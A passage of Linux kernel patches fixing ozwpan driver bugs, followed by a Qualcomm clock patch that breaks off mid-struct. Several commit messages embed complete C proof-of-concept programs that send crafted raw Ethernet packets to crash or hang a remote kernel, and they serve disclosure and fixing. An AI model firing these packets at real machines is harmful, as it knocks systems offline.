=-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(2), .total_size = htole16(1), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 
0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozhcd.c | 8 ++++---- drivers/staging/ozwpan/ozusbif.h | 4 ++-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/staging/ozwpan/ozhcd.c b/drivers/staging/ozwpan/ozhcd.c index 5ff4716b72c3..784b5ecfa849 100644 --- a/drivers/staging/ozwpan/ozhcd.c +++ b/drivers/staging/ozwpan/ozhcd.c @@ -746,8 +746,8 @@ void oz_hcd_pd_reset(void *hpd, void *hport) /* * Context: softirq */ -void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc, - int length, int offset, int total_size) +void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, const u8 *desc, + u8 length, u16 offset, u16 total_size) { struct oz_port *port = hport; struct urb *urb; @@ -759,8 +759,8 @@ void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc, if (!urb) return; if (status == 0) { - int copy_len; - int required_size = urb->transfer_buffer_length; + unsigned int copy_len; + unsigned int required_size = urb->transfer_buffer_length; if (required_size > total_size) required_size = total_size; diff --git a/drivers/staging/ozwpan/ozusbif.h b/drivers/staging/ozwpan/ozusbif.h index 4249fa374012..d2a6085345be 100644 --- a/drivers/staging/ozwpan/ozusbif.h +++ b/drivers/staging/ozwpan/ozusbif.h @@ -29,8 +29,8 @@ void oz_usb_request_heartbeat(void *hpd); /* Confirmation functions. */ -void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, - const u8 *desc, int length, int offset, int total_size); +void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, + const u8 *desc, u8 length, u16 offset, u16 total_size); void oz_hcd_control_cnf(void *hport, u8 req_id, u8 rcode, const u8 *data, int data_len); From 04bf464a5dfd9ade0dda918e44366c2c61fce80b Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:07:00 +0200 Subject: [PATCH 479/872] ozwpan: divide-by-zero leading to panic A network supplied parameter was not checked before division, leading to a divide-by-zero. Since this happens in the softirq path, it leads to a crash. A PoC follows below, which requires the ozprotocol.h file from this module. 
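For reference, a minimal sketch of the guard itself (names are stand-ins for the driver's):

#include <stdint.h>
#include <stdio.h>

/* unit_size arrives from the network; dividing by it unchecked is the
 * crash described above. */
unsigned int count_units(size_t payload_len, uint8_t unit_size)
{
        if (unit_size == 0)                    /* reject the malformed element */
                return 0;
        return payload_len / unit_size;
}

int main(void)
{
        printf("%u\n", count_units(48, 0));    /* 0 instead of a crash */
        printf("%u\n", count_units(48, 8));    /* 6 */
        return 0;
}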
=-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; struct oz_elt oz_elt2; struct oz_multiple_fixed oz_multiple_fixed; } __packed packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 0, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 }, .oz_elt2 = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_multiple_fixed) }, .oz_multiple_fixed = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_USB_ENDPOINT_DATA, .endpoint = 0, .format = OZ_DATA_F_MULTIPLE_FIXED, .unit_size = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. 
Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozusbsvc1.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/staging/ozwpan/ozusbsvc1.c b/drivers/staging/ozwpan/ozusbsvc1.c index b573ad3e9674..7b13dc910172 100644 --- a/drivers/staging/ozwpan/ozusbsvc1.c +++ b/drivers/staging/ozwpan/ozusbsvc1.c @@ -326,7 +326,10 @@ static void oz_usb_handle_ep_data(struct oz_usb_ctx *usb_ctx, struct oz_multiple_fixed *body = (struct oz_multiple_fixed *)data_hdr; u8 *data = body->data; - int n = (len - sizeof(struct oz_multiple_fixed)+1) + int n; + if (!body->unit_size) + break; + n = (len - sizeof(struct oz_multiple_fixed)+1) / body->unit_size; while (n--) { oz_hcd_data_ind(usb_ctx->hport, body->endpoint, From 9a59029bc218b48eff8b5d4dde5662fd79d3e1a8 Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Fri, 29 May 2015 13:07:01 +0200 Subject: [PATCH 480/872] ozwpan: unchecked signed subtraction leads to DoS The subtraction here was using a signed integer and did not have any bounds checking at all. This commit adds proper bounds checking, made easy by use of an unsigned integer. This way, a single packet won't be able to remotely trigger a massive loop, locking up the system for a considerable amount of time. A PoC follows below, which requires ozprotocol.h from this module. =-=-=-=-=-= #include #include #include #include #include #include #include #include #include #include #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; struct oz_elt oz_elt2; struct oz_multiple_fixed oz_multiple_fixed; } __packed packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 0, .ms_isoc_latency = 
0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 }, .oz_elt2 = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_multiple_fixed) - 3 }, .oz_multiple_fixed = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_USB_ENDPOINT_DATA, .endpoint = 0, .format = OZ_DATA_F_MULTIPLE_FIXED, .unit_size = 1, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozusbsvc1.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/staging/ozwpan/ozusbsvc1.c b/drivers/staging/ozwpan/ozusbsvc1.c index 7b13dc910172..f660bb198c65 100644 --- a/drivers/staging/ozwpan/ozusbsvc1.c +++ b/drivers/staging/ozwpan/ozusbsvc1.c @@ -326,10 +326,11 @@ static void oz_usb_handle_ep_data(struct oz_usb_ctx *usb_ctx, struct oz_multiple_fixed *body = (struct oz_multiple_fixed *)data_hdr; u8 *data = body->data; - int n; - if (!body->unit_size) + unsigned int n; + if (!body->unit_size || + len < sizeof(struct oz_multiple_fixed) - 1) break; - n = (len - sizeof(struct oz_multiple_fixed)+1) + n = (len - (sizeof(struct oz_multiple_fixed) - 1)) / body->unit_size; while (n--) { oz_hcd_data_ind(usb_ctx->hport, body->endpoint, From f7b81d67d0547c6ce246c89900eaa41303a3f89a Mon Sep 17 00:00:00 2001 From: Stephen Boyd Date: Wed, 27 May 2015 11:02:46 -0700 Subject: [PATCH 481/872] clk: qcom: Add support for NSS/GMAC clocks and resets Add the NSS/GMAC clocks and the TCM clock and NSS resets. Signed-off-by: Stephen Boyd Signed-off-by: Mathieu Olivari Signed-off-by: David S. 
Miller --- drivers/clk/qcom/gcc-ipq806x.c | 594 ++++++++++++++++++- include/dt-bindings/clock/qcom,gcc-ipq806x.h | 2 + include/dt-bindings/reset/qcom,gcc-ipq806x.h | 43 ++ 3 files changed, 638 insertions(+), 1 deletion(-) diff --git a/drivers/clk/qcom/gcc-ipq806x.c b/drivers/clk/qcom/gcc-ipq806x.c index a50936a17376..563969942a1d 100644 --- a/drivers/clk/qcom/gcc-ipq806x.c +++ b/drivers/clk/qcom/gcc-ipq806x.c @@ -140,12 +140,47 @@ static struct clk_regmap pll14_vote = { }, }; +#define NSS_PLL_RATE(f, _l, _m, _n, i) \ + { \ + .freq = f, \ + .l = _l, \ + .m = _m, \ + .n = _n, \ + .ibits = i, \ + } + +static struct pll_freq_tbl pll18_freq_tbl[] = { + NSS_PLL_RATE(550000000, 44, 0, 1, 0x01495625), + NSS_PLL_RATE(733000000, 58, 16, 25, 0x014b5625), +}; + +static struct clk_pll pll18 = { + .l_reg = 0x31a4, + .m_reg = 0x31a8, + .n_reg = 0x31ac, + .config_reg = 0x31b4, + .mode_reg = 0x31a0, + .status_reg = 0x31b8, + .status_bit = 16, + .post_div_shift = 16, + .post_div_width = 1, + .freq_tbl = pll18_freq_tbl, + .clkr.hw.init = &(struct clk_init_data){ + .name = "pll18", + .parent_names = (const char *[]){ "pxo" }, + .num_parents = 1, + .ops = &clk_pll_ops, + }, +}; + enum { P_PXO, P_PLL8, P_PLL3, P_PLL0, P_CXO, + P_PLL14, + P_PLL18, }; static const struct parent_map gcc_pxo_pll8_map[] = { @@ -197,6 +232,22 @@ static const char *gcc_pxo_pll8_pll0_map[] = { "pll0_vote", }; +static const struct parent_map gcc_pxo_pll8_pll14_pll18_pll0_map[] = { + { P_PXO, 0 }, + { P_PLL8, 4 }, + { P_PLL0, 2 }, + { P_PLL14, 5 }, + { P_PLL18, 1 } +}; + +static const char *gcc_pxo_pll8_pll14_pll18_pll0[] = { + "pxo", + "pll8_vote", + "pll0_vote", + "pll14", + "pll18", +}; + static struct freq_tbl clk_tbl_gsbi_uart[] = { { 1843200, P_PLL8, 2, 6, 625 }, { 3686400, P_PLL8, 2, 12, 625 }, @@ -2202,6 +2253,472 @@ static struct clk_branch ebi2_aon_clk = { }, }; +static const struct freq_tbl clk_tbl_gmac[] = { + { 133000000, P_PLL0, 1, 50, 301 }, + { 266000000, P_PLL0, 1, 127, 382 }, + { } +}; + +static struct clk_dyn_rcg gmac_core1_src = { + .ns_reg[0] = 0x3cac, + .ns_reg[1] = 0x3cb0, + .md_reg[0] = 0x3ca4, + .md_reg[1] = 0x3ca8, + .bank_reg = 0x3ca0, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3ca0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core1_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core1_clk = { + .halt_reg = 0x3c20, + .halt_bit = 4, + .hwcg_reg = 0x3cb4, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3cb4, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core1_clk", + .parent_names = (const char *[]){ + "gmac_core1_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static struct clk_dyn_rcg gmac_core2_src = { + .ns_reg[0] = 0x3ccc, + .ns_reg[1] = 0x3cd0, + .md_reg[0] = 0x3cc4, + 
.md_reg[1] = 0x3cc8, + .bank_reg = 0x3ca0, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3cc0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core2_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core2_clk = { + .halt_reg = 0x3c20, + .halt_bit = 5, + .hwcg_reg = 0x3cd4, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3cd4, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core2_clk", + .parent_names = (const char *[]){ + "gmac_core2_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static struct clk_dyn_rcg gmac_core3_src = { + .ns_reg[0] = 0x3cec, + .ns_reg[1] = 0x3cf0, + .md_reg[0] = 0x3ce4, + .md_reg[1] = 0x3ce8, + .bank_reg = 0x3ce0, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3ce0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core3_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core3_clk = { + .halt_reg = 0x3c20, + .halt_bit = 6, + .hwcg_reg = 0x3cf4, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3cf4, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core3_clk", + .parent_names = (const char *[]){ + "gmac_core3_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static struct clk_dyn_rcg gmac_core4_src = { + .ns_reg[0] = 0x3d0c, + .ns_reg[1] = 0x3d10, + .md_reg[0] = 0x3d04, + .md_reg[1] = 0x3d08, + .bank_reg = 0x3d00, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = 
clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3d00, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core4_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core4_clk = { + .halt_reg = 0x3c20, + .halt_bit = 7, + .hwcg_reg = 0x3d14, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3d14, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core4_clk", + .parent_names = (const char *[]){ + "gmac_core4_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static const struct freq_tbl clk_tbl_nss_tcm[] = { + { 266000000, P_PLL0, 3, 0, 0 }, + { 400000000, P_PLL0, 2, 0, 0 }, + { } +}; + +static struct clk_dyn_rcg nss_tcm_src = { + .ns_reg[0] = 0x3dc4, + .ns_reg[1] = 0x3dc8, + .bank_reg = 0x3dc0, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 4, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 4, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_nss_tcm, + .clkr = { + .enable_reg = 0x3dc0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "nss_tcm_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch nss_tcm_clk = { + .halt_reg = 0x3c20, + .halt_bit = 14, + .clkr = { + .enable_reg = 0x3dd0, + .enable_mask = BIT(6) | BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "nss_tcm_clk", + .parent_names = (const char *[]){ + "nss_tcm_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static const struct freq_tbl clk_tbl_nss[] = { + { 110000000, P_PLL18, 1, 1, 5 }, + { 275000000, P_PLL18, 2, 0, 0 }, + { 550000000, P_PLL18, 1, 0, 0 }, + { 733000000, P_PLL18, 1, 0, 0 }, + { } +}; + +static struct clk_dyn_rcg ubi32_core1_src_clk = { + .ns_reg[0] = 0x3d2c, + .ns_reg[1] = 0x3d30, + .md_reg[0] = 0x3d24, + .md_reg[1] = 0x3d28, + .bank_reg = 0x3d20, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_nss, + .clkr = { + .enable_reg = 0x3d20, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "ubi32_core1_src_clk", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + .flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE, + }, + }, +}; + +static struct clk_dyn_rcg ubi32_core2_src_clk = { + .ns_reg[0] = 0x3d4c, + .ns_reg[1] = 0x3d50, + .md_reg[0] = 0x3d44, + .md_reg[1] = 0x3d48, + .bank_reg = 0x3d40, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + 
